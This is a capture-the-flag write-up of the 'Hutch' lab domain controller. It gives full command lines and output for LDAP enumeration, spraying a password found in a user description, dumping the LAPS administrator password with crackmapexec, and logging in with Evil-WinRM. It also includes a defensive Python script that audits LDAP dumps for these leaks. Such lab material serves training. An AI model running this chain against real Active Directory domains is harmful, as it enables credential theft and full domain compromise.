Hutch
Description
This machine was compromised by auditing LDAP: first I was able to extract the users, and then the password rotated by LAPS.
Enumeration
Nmap
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/10.0
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Date: Sun, 12 Jun 2022 18:49:10 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|_ Server Type: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-12 18:48:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
http://192.168.164.122 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[192.168.164.122], Microsoft-IIS[10.0], Title[IIS Windows Server], X-Powered-By[ASP.NET]
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 04 Nov 2020 05:35:35 GMT
Accept-Ranges: bytes
ETag: "965c9516cb2d61:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Sun, 12 Jun 2022 19:29:31 GMT
Content-Length: 703
Nikto
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.164.122
+ Target Port: 80
+ GET Retrieved x-powered-by header: ASP.NET
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Retrieved x-aspnet-version header: 4.0.30319
+ OPTIONS Retrieved dav header: 1,2,3
+ OPTIONS Retrieved ms-author-via header: DAV
+ OPTIONS Uncommon header 'ms-author-via' found, with contents: DAV
+ OPTIONS Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
+ OSVDB-397: GET HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: GET HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-5647: GET HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
+ OSVDB-397: GET HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: GET HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-5647: GET HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS WebDAV enabled (LOCK COPY PROPPATCH UNLOCK PROPFIND MKCOL listed as allowed)
User Own
We enumerate LDAP
root@kali:~/PG/192.168.164.122# ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.164.122" "(objectclass=*)" > ldap.txt
ldap_initialize( ldap://192.168.164.122:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
Users
root@kali:~/PG/192.168.164.122# cat ldap.txt |grep -i principalname
userPrincipalName: rplacidi@hutch.offsec
userPrincipalName: opatry@hutch.offsec
userPrincipalName: ltaunton@hutch.offsec
userPrincipalName: acostello@hutch.offsec
userPrincipalName: jsparwell@hutch.offsec
userPrincipalName: oknee@hutch.offsec
userPrincipalName: jmckendry@hutch.offsec
userPrincipalName: avictoria@hutch.offsec
userPrincipalName: jfrarey@hutch.offsec
userPrincipalName: eaburrow@hutch.offsec
userPrincipalName: cluddy@hutch.offsec
userPrincipalName: agitthouse@hutch.offsec
userPrincipalName: fmcsorley@hutch.offsec
Clear Password
root@kali:~/PG/192.168.164.122# cat ldap.txt |grep -i password
badPasswordTime: 0
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offse
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offse
# Allowed RODC Password Replication Group, Users, hutch.offsec
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec
cn: Allowed RODC Password Replication Group
description: Members in this group can have their passwords replicated to all
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutc
name: Allowed RODC Password Replication Group
sAMAccountName: Allowed RODC Password Replication Group
# Denied RODC Password Replication Group, Users, hutch.offsec
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec
cn: Denied RODC Password Replication Group
description: Members in this group cannot have their passwords replicated to a
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch
name: Denied RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
badPasswordTime: 0
description: Password set to CrabSharkJellyfish192 at user's request. Please c
badPasswordTime: 132489437036308102
Spraying Password
root@kali:~/PG/192.168.164.122/xpl# crackmapexec smb hutch.offsec -u validusers.txt -p CrabSharkJellyfish192
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\rplacidi:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\opatry:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\ltaunton:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\acostello:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\jsparwell:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\oknee:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\jmckendry:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\avictoria:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\jfrarey:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\eaburrow:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\cluddy:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\agitthouse:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192
root@kali:~/PG/192.168.164.122/xpl# crackmapexec smb hutch.offsec -u fmcsorley -p CrabSharkJellyfish192
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192
Credentials
user: fmcsorley
pass: CrabSharkJellyfish192
Root Own
CrackMapExec LAPS DUMP
root@kali:~/PG/192.168.55.122# crackmapexec ldap hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -M laps
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
LDAP HUTCHDC.hutch.offsec 389 HUTCHDC [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192
LAPS HUTCHDC.hutch.offsec 389 HUTCHDC [*] Getting LAPS Passwords
LAPS HUTCHDC.hutch.offsec 389 HUTCHDC Computer: HUTCHDC$ Password: V2%.#lQ+t72%Rx
root@kali:~/PG/192.168.55.122# crackmapexec ldap hutch.offsec -u Administrator -p 'V2%.#lQ+t72%Rx'
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
LDAP HUTCHDC.hutch.offsec 389 HUTCHDC [+] hutch.offsec\Administrator:V2%.#lQ+t72%Rx (Pwn3d!)
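Both LDAP findings on this box (a password left in a user's description attribute, and the LAPS password readable over LDAP by a low-privilege domain user) can be picked out of a raw ldapsearch dump automatically. The audit script below is an added example, not part of the writeup or of any tool it uses; the LDIF sample is constructed to mirror the output above, and it assumes LAPS stores the local admin password in the ms-Mcs-AdmPwd attribute.

```python
import re
from collections import defaultdict
# Constructed sample in ldapsearch's LDIF shape (not the box's real ldap.txt);
# values longer than 76 columns are folded onto lines starting with a space.
SAMPLE_LDIF = """\
dn: CN=fmcsorley,CN=Users,DC=hutch,DC=offsec
userPrincipalName: fmcsorley@hutch.offsec
description: Password set to CrabSharkJellyfish192 at user's request. Please c
 hange it at next logon.

dn: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec
description: Members in this group cannot have their passwords replicated

dn: CN=HUTCHDC,OU=Domain Controllers,DC=hutch,DC=offsec
sAMAccountName: HUTCHDC$
ms-Mcs-AdmPwd: V2%.#lQ+t72%Rx
"""

# Word-boundary match, so "passwords replicated" in the RODC groups is not hit.
PASSWORD_HINT = re.compile(r"\b(password|passwd|pwd|contrase[nñ]a)\b", re.I)

def parse_ldif(text):
    """One {attribute: [values]} dict per entry; '::' (base64) values stay encoded."""
    entries, current, last = [], defaultdict(list), None
    for line in text.splitlines():
        if line.startswith(" ") and last:                # folded continuation
            current[last][-1] += line[1:]
        elif not line.strip() or line.startswith("#"):   # entry separator / comment
            if current:
                entries.append(dict(current))
            current, last = defaultdict(list), None
        else:
            attr, _, value = line.partition(":")
            last = attr.strip()
            current[last].append(value.lstrip(" "))
    if current:
        entries.append(dict(current))
    return entries

def audit(entries):
    """Flag password-bearing descriptions and any readable LAPS ms-Mcs-AdmPwd attribute."""
    findings = []
    for e in entries:
        who = (e.get("userPrincipalName") or e.get("sAMAccountName") or e.get("dn", ["?"]))[0]
        findings += [("description-leak", who, d)
                     for d in e.get("description", []) if PASSWORD_HINT.search(d)]
        if "ms-Mcs-AdmPwd" in e:
            findings.append(("laps-readable", who, "ms-Mcs-AdmPwd exposed over LDAP"))
    return findings
```

Run it against a real ldap.txt with `audit(parse_ldif(open("ldap.txt").read()))`; a laps-readable finding from a dump taken as an ordinary user means the ms-Mcs-AdmPwd read permission is delegated too widely.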
Proof
*Evil-WinRM* PS C:\users\administrator\desktop> type proof.txt
bb0894567e7c965de6cca5c6838a8834
*Evil-WinRM* PS C:\users\administrator\desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::d140:9ec3:5c28:43fe%3
IPv4 Address. . . . . . . . . . . : 192.168.55.122
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.55.254
Extra
NTDS